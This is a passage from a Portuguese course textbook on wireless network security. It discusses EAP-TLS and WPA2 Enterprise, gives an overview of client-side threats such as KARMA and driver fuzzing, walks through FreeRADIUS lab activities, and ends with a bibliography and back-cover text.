Outro ponto positivo de EAP-TLS é o amplo suporte oferecido pelas principais plataformas
de cliente, notadamente Linux, BSD e Windows.

Desvantagens de EAP-TLS
Depende de uma ICP bem implantada. q
11 Recomendável para distribuição e gerenciamento adequados de chaves.

11 Smart cards tornam autenticação mais fácil para usuários.

Divulgação de identidade nos certificados.

11 Certificados de Cliente e Servidor são transmitidos em texto claro.

11 Informações divulgadas sobre dispositivos, organização e sobre os próprios certificados.

11 Possibilidade de ataques de engenharia social.


Segurança em Redes sem Fio

Ter uma ICP bem implantada é condição básica para uma implantação bem-sucedida desse
tipo de EAP. Armazenar os certificados na forma de smart cards pode ser uma opção inte-
ressante para tornar o uso de certificados mais simples para o usuário final. Essa tecnologia
também diminui o risco de acesso indevido à rede, no caso de o atacante ter acesso a um
cliente com certificado instalado. A necessidade de uma ICP não é exatamente uma desvan-
tagem de EAP-TLS, mas sim um fator que adiciona complexidade ao esquema de segurança
que desencoraja muitas organizações a adotá-lo.

174
Esse esquema de segurança, entretanto, tem uma vulnerabilidade: divulgação de infor-
mações. Tanto o certificado do cliente quanto do servidor são enviados em texto claro,
divulgando informações sobre os certificados. A posse dessas informações não é útil para
um ataque à integridade das conexões, mas pode ajudar na coleta de informações que
precedem um ataque de engenharia social. A transmissão de certificados em claro pela
rede, embora pareça uma falha de segurança, é prática comum em protocolos de segurança
consagrados, como SSL ou o próprio TLS.

Na prática, não implantaremos uma ICP, uma vez que isso está fora do escopo do curso.
Para demonstrar um cenário com WPA2 e EAP-TLS, serão gerados manualmente um par de
certificados para o cliente e outro para o servidor, sem a presença de uma infraestrutura de
distribuição de chaves conforme tipicamente encontrada em uma ICP.

Conclusão
WPA2 Enterprise com EAP-TLS. q
11 Ainda é o mecanismo EAP mais seguro.

11 Pode ser associado a smart cards.

11 Controle do acesso à rede sem fio.

11 Tráfego cifrado entre cliente e AP.

22 Entre AP e rede de distribuição, depende da aplicação.

Segurança tradicional nos clientes deve receber atenção.

11 Personal firewall, Antivírus, Anti-spyware e aplicação de correções de segurança.

WPA2, por si só, ainda é um bom mecanismo de segurança, mesmo usado numa configu-
ração com chave compartilhada (WPA2-PSK). Embora esse nível de segurança seja suficiente
para empresas no que diz respeito à integridade e confidencialidade dos dados trafegados,
a autenticação se torna mais consistente quando WPA2 Enterprise é implementada em sua
totalidade, com o uso de 802.1x e de uma arquitetura de autenticação.

É bom lembrar que, uma vez conectado à rede, o cliente está sujeito aos mesmos problemas
de segurança de estações da rede cabeada: worms, exploração de vulnerabilidades e
spywares, entre outras ameaças existentes. É importante manter o sistema atualizado com
as últimas versões e protegido com antivírus e anti-spyware atualizados, além de um firewall

w Outra questão que deve ser considerada é que um AP com WPA2 e EAP-TLS implementados
pessoal bem configurado.

Saiba mais: “Best EAP Capítulo 10 - Implantando uma WLAN segura (parte 2)
for an enterprise oferece tráfego cifrado apenas entre cliente e AP, ou seja, na rede cabeada (rede de distri-
wireless LAN” e buição) o tráfego pode ser observado. Para garantir tráfego cifrado até o destino, é possível
“Guidelines for
usar um proxy com HTTPS ou um proxy sobre uma VPN (Virtual Private Network).
Securing Wireless Local
Area Networks
Seu cliente pode estar seguro dentro do domínio da sua rede sem fio, mas não usando outras
(WLANs)” do National
Institute of Standards redes. Um exemplo de cenário possível seria aquele de um cliente conectado a um hotspot
and technology (NIST). (Vex, T-Mobile etc.), que não implementa isolamento de tráfego entre os clientes, permitindo a
propagação de worms e a exploração de vulnerabilidades por parte de outros clientes.

175
Cenário atual
11 Segurança no AP hoje é possível. q
11 Novo alvo está nos clientes.

11 Ferramentas que se passam pela rede à qual o cliente quer se conectar, seja ela qual for:

22 Ferramenta KARMA, de Dino Dai Zovi.

22 802.11 Protocol Fuzzing.

33 Exploração de vulnerabilidades nos drivers das interfaces 802.11 – Black Hat


2006/DEFCON 14.

33 Firewall pessoal é irrelevante.

33 A atualização dos drivers da interface Wi-Fi é fundamental.

Do ponto de vista do AP, é possível dizer que as redes sem fio estão muito seguras. O novo
alvo de ataques está em dispositivos Bluetooth (802.15.1) e em clientes Wi-Fi.

Ferramentas como KARMA – disponível para Linux e compatível com interfaces de rede
Atheros e driver MadWifi – permitem a simulação de qualquer rede com a qual um cliente
queira se conectar. Dessa forma, se um cliente tenta se conectar a um AP com SSID “ESR”,
KARMA simula uma rede com as mesmas características para levar o cliente a se conectar ao
atacante. Uma vez conectado, o cliente pode fornecer dados interessantes para o atacante,
como credenciais do servidor de e-mail IMAP/SMTP/POP, Instant Messaging (ICQ, Skype) ou
serviços normalmente configurados para login automático por grande parte dos usuários.
Outra oportunidade criada por um ataque desse tipo é a exploração de vulnerabilidades
não corrigidas no cliente.

Outro tipo de ataque que tem sido motivo de muita preocupação é o ataque ao driver da
interface Wi-Fi. Isso é possível com uma técnica chamada fuzzing de protocolo que consiste
em testar a interface com parâmetros não previstos pelo padrão IEEE 802.11. Campos do
quadro de gerenciamento com mais conteúdo do que a especificação determina, entre
outros casos de teste, podem causar buffer overflow, entre outros efeitos na interface Wi-Fi.

Os pesquisadores Jon “Johnny Cache” Ellch e Dave Maynor divulgaram, superficialmente,


nas conferências hacker Black Hat 2006 e DEFCON 14, parte de vulnerabilidades que
afetam drivers de interfaces Wi-Fi em notebooks Apple. A demonstração da vulnerabilidade
mostrava o pesquisador obtendo shell root remoto no cliente atacado no nível do driver; a
presença de um firewall pessoal, nesse caso, demonstrou ser irrelevante.

Os administradores de rede podem tirar algumas conclusões importantes: rede sem


fio segura envolve também clientes com dispositivos tradicionais de segurança de
rede e com drivers dos dispositivos atualizados.
Segurança em Redes sem Fio

176
Roteiro de Atividades 10
Atividade 10.1 – Autenticação RADIUS
Nesta atividade, configuraremos o AP e o cliente para utilização do protocolo WPA2 Enterprise.
O protocolo 802.1x será usado para a autenticação através do método EAP-TLS.

O servidor de autenticação remota será o FreeRADIUS, rodando sob um Linux Fedora Core 6,
previamente instalado e configurado em nosso ambiente de laboratório. Os seguintes
passos após a instalação do FreeRADIUS no servidor foram feitos:

11 Configuração da senha compartilhada com o AP;

11 Definição da porta que o servidor estará “escutando” (normalmente 1812);

11 Geração de certificados para cada aluno e servidor;

11 Definição das contas dos alunos e senhas a serem divulgadas pelo instrutor;

11 Instalação dos certificados no servidor e nos desktops.

Essa pequena infraestrutura foi criada apenas para que os alunos tenham a oportunidade
de trabalhar com esse tipo de configuração, considerada hoje uma das mais seguras.
A implantação correta de EAP-TLS envolve uma Infraestrutura de Chaves Públicas (ICP), o
que está fora do escopo deste curso.

Atividade 10.2 – Configuração do AP com WPA2 Enterprise


Nesta atividade, configuraremos seu AP para utilizar WPA2 Enterprise, com EAP-TLS e RADIUS.

Através da interface de configuração web do AP, configure o AP para WPA2 Enterprise e


criptografia AES. Configure o IP e a porta do servidor RADIUS a ser utilizada (normalmente
1812). Insira a chave compartilhada (shared secret) divulgada pelo instrutor, que será usada
na autenticação do AP com o servidor RADIUS.

Na prática, podemos utilizar alguns softwares, como o Password Amplifier, para gerar uma
chave compartilhada forte.

Capítulo 10 - Roteiro de Atividades

177
Atividade 10.3 – Testando a autenticação
Verifique as opções de configuração de sua interface sem fio no Windows, para associação
através do WPA2, autenticação 802.1x e método EAP-TLS.

Propriedades do certificado:

Teste a autenticação associando-se ao AP. Observe a troca de pacotes através do Kismet.

Atividade 10.4 – Arquivos de configuração do RADIUS


Este item possui apenas caráter informativo, caso o aluno queira se aprofundar sobre a
configuração de servidores RADIUS, assunto que está fora do escopo do curso.

Para fazer com que o serviço RADIUS sempre “suba” ao inicializar o Sistema Operacional do
servidor Linux, execute:
Segurança em Redes sem Fio

# chkconfig radiusd on

Todos os arquivos de configuração do RADIUS estão localizados em /etc/raddb.

Dentre eles destacam-se:

11 radiusd.conf: Arquivo geral de configuração.

11 eap.conf: arquivo de configuração das diretivas EAP a utilizar.

178
11 clients.conf: descrição e credenciais dos diferentes dispositivos que consultam o RADIUS
(APS, NAS etc.)

11 users: arquivo onde estão as credenciais dos usuários da rede.

Para criar uma Autoridade Certificadora (CA) e o certificado, pode-se usar os scripts contidos
em: http://www.alphacore.net/contrib/nantes-wireless/eap-tls-HOWTO.html

# cd /etc/raddb/certs

11 CA.root: cript de criação da CA.

11 CA.server: script de criação dos certificados para o servidor (Fully Qualified Domain
Nome – FQDN).

11 CA.client: script de criação de certificados para cada usuário. Não confundir com clients.conf
do RADIUS.

11 Xpextensions: OID para EAP-TLS.

11 Copiar os arquivos root.der (certificado da CA) e <usuário>.p12 (chave privada e certificado


do cliente).

Para mais informações, acesse:

# man radiusd

Capítulo 10 - Roteiro de Atividades

179
Segurança em Redes sem Fio

180
Bibliografia

11 Aircrack-ng – http://www.aircrack-ng.org

11 Aircrack-ptw – http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/

11 AirPcap: The USB 2.0 Wireless Capture Adapter for Windows that enables
Wireless Capture with Wireshark –
http://www.cacetech.com/products/airpcap.htm

11 ANATEL: Resolução nº 506 de 1º de julho de 2008 – http://www.anatel.gov.br/

11 Bluetooth – http://www.bluetooth.com

11 CoWPAtty – http://wirelessdefence.org/Contents/coWPAttyMain.htm

11 Daily Wireless – http://www.dailywireless.org/

11 FLUHRER, Scott ; MANTIN, Itsik ; SHAMIR, Adi. Weaknesses in the Key


Scheduling Algorithm of RC4 –
http://www.drizzle.com/~aboba/IEEE/rc4_ksaproc.pdf

11 GT Rede Mesh – http://www.rnp.br/pd/gts2005-2006/mesh.html

11 Host AP driver for Intersil Prism2/2.5/3, hostapd and WPA Supplicant –


http://hostap.epitest.fi/

11 How to Setup a Capture – http://wiki.wireshark.org/CaptureSetup

11 John the Ripper password cracker – http://www.openwall.com/john/

11 KARMA Wireless Client Security Assessment Tools –


http://www.theta44.org/main.html

11 Linux wireless LAN support – http://linux-wless.passys.nl/

11 Linux WPA/WPA2/IEEE 802.1X Supplicant –


http://hostap.epitest.fi/wpa_supplicant/

11 Linux WPA/WPA2/IEEE 802.1X Supplicant –


http://hostap.epitest.fi/wpa_supplicant/

11 MadWifi – http://madwifi.org/

11 Microsoft Windows Silent Adhoc Network Advertisement –


http://www.nmrc.org/pub/advise/20060114.txt
Bibliografia

11 MPL/GPL drivers for the Wavelan IEEE/Orinoco and others –


http://www.hpl.hp.com/

181
11 Muni Wireless – http://www.muniwireless.com/

11 Nessus – http://www.nessus.org

11 NIST Computer Security DRAFT Publications –


http://csrc.nist.gov/publications/drafts.html

11 Padrões do grupo IEEE 802.11 – http://grouper.ieee.org/groups/802/11/

11 Project IEEE 802.11 Task Group w: Protected Management Frames –


http://grouper.ieee.org/groups/802/11/Reports/tgw_update.htm

11 Recomendações Wi-Fi Alliance – http://www.wi-fi.org

11 San Francisco TechConnect –


http://www.sfgov.org/site/tech_connect_page.asp

11 SANS ISC Handler’s Diary February 22nd 2005 (Wireless Standards) –


http://isc.sans.org/diary.php?date=2005-02-22

11 SANS ISC Handler’s Diary November 10th 2005 (More 802.11 soup) –
http://isc.sans.org/diary.php?storyid=837

11 Secure works black hat coverage: senior secure works researcher exposes
vulnerabilities in Wireless Device Drivers at Black Hat Conference –
http://www.secureworks.com/newsandevents/blackhatcoverage.html

11 Status of Project IEEE 802.11 Task Group W (Protected Management Frames) –


http://grouper.ieee.org/groups/802/11/Reports/tgw_update.htm

11 TCPdump/libpcap – http://www.tcpdump.org/

11 Technet Script Center: Scripting Tools and Utilities –


http://www.microsoft.com/technet/scriptcenter/createit.mspx

11 The IEEE 802.16 Working Group on Broadband Wireless Access Standards –


http://grouper.ieee.org/groups/802/16/

11 The Linux-WLAN Project – http://www.linux-wlan.org/

11 Tim Newsham: WLAN Tools (wep_crack) – http://lava.net/~newsham/wlan/

11 Understanding 802.11 Frame Types – http://www.wifiplanet.com

11 WepAttack – http://wepattack.sourceforge.net/

11 WiMAX Forum – http://www.wimaxforum.org

11 WinPcap – http://www.winpcap.org/

11 Wireless Tools for Linux –


http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/

11 Wireless Tools for Linux –


http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/Tools.html
Segurança em Redes sem Fio

11 Wireshark – http://www.wireshark.org/

11 Wireshark Display Filter Reference: IEEE 802.11 wireless LAN –


http://wireshark.org/docs/dfref/w/wlan.html

11 WRIGHT, Joshua. Best EAP for an enterprise wireless LAN. NetworkWorld.com –


http://www.networkworld.com/columnists/2006/062606-wireless-
security.html

182
Ronaldo Vasconcellos é formado em
Análise de Sistemas (PUC Campinas),
com especialização em redes (IC Uni-
camp) e certificações GIAC Certified
Incident Handler (GCIH) e GIAC
Assessing and Auditing Wireless
Networks (GAWN). Trabalha com segu-
rança computacional desde 2002 (seis anos na área de Res-
posta a Incidentes Computacionais), e desde 2010 na área de
pesquisa em Ameaças Cibernéticas e Cibercrime, com foco
no Brasil e Ibero-América.
Ronaldo Vasconcellos é formado em A RNP – Rede Nacional de Ensino
Análise de Sistemas (PUC Campinas),
com especialização em redes (IC Uni-
e Pesquisa – é qualificada como
camp) e certificações GIAC Certified uma Organização Social (OS),
Incident Handler (GCIH) e GIAC Asses-
sing and Auditing Wireless Networks sendo ligada ao Ministério da
(GAWN). Trabalha com segurança Ciência, Tecnologia e Inovação
computacional desde 2002 (seis anos na área de Resposta
a Incidentes Computacionais), e desde 2010 na área de (MCTI) e responsável pelo
pesquisa em Ameaças Cibernéticas e Cibercrime, com foco Programa Interministerial RNP,
no Brasil e Ibero-América.
que conta com a participação dos
O curso tem por objetivo capacitar o participante para
ministérios da Educação (MEC), da

Segurança em
a realização da segurança do ambiente wireless da sua
Saúde (MS) e da Cultura (MinC).
organização. Serão ensinados os fundamentos de ra-

LIVRO DE APOIO AO CURSO


Pioneira no acesso à Internet no
diofrequência e identificados os principais protocolos e
Brasil, a RNP planeja e mantém a

Redes

Segurança em Redes sem Fio


normas envolvidas na comunicação Wi-Fi. Com ênfase
rede Ipê, a rede óptica nacional
em redes IEEE 802.11a/b/g/n, serão apresentados os
acadêmica de alto desempenho.
riscos que ameaçam este tipo de rede, e técnicas para
Com Pontos de Presença nas

sem Fio
mitigá-los com uso de ferramentas baseadas em Linux
27 unidades da federação, a rede
e Windows. Serão desenvolvidas as competências para
tem mais de 800 instituições
a estruturação de uma rede sem fio de forma segura e
conectadas. São aproximadamente
atendendo a todos os requisitos necessários para impe-
3,5 milhões de usuários usufruindo
dir os principais ataques. O aluno será ainda familiari-
de uma infraestrutura de redes
zado com ferramentas livres para verificação da rede e
avançadas para comunicação,
realização de auditorias de segurança.
computação e experimentação,
Este livro inclui os roteiros das atividades práticas e o
que contribui para a integração
conteúdo dos slides apresentados em sala de aula,
apoiando profissionais na disseminação deste conheci- Ronaldo Vasconcellos entre o sistema de Ciência e
Tecnologia, Educação Superior,
mento em suas organizações ou localidades de origem.
Saúde e Cultura.

Ministério da
Cultura

Ministério da
Saúde

Ministério da
Educação
ISBN 978–85–63630–30–8
Ministério da
Ciência, Tecnologia
e Inovação

9 788563 630308

Você também pode gostar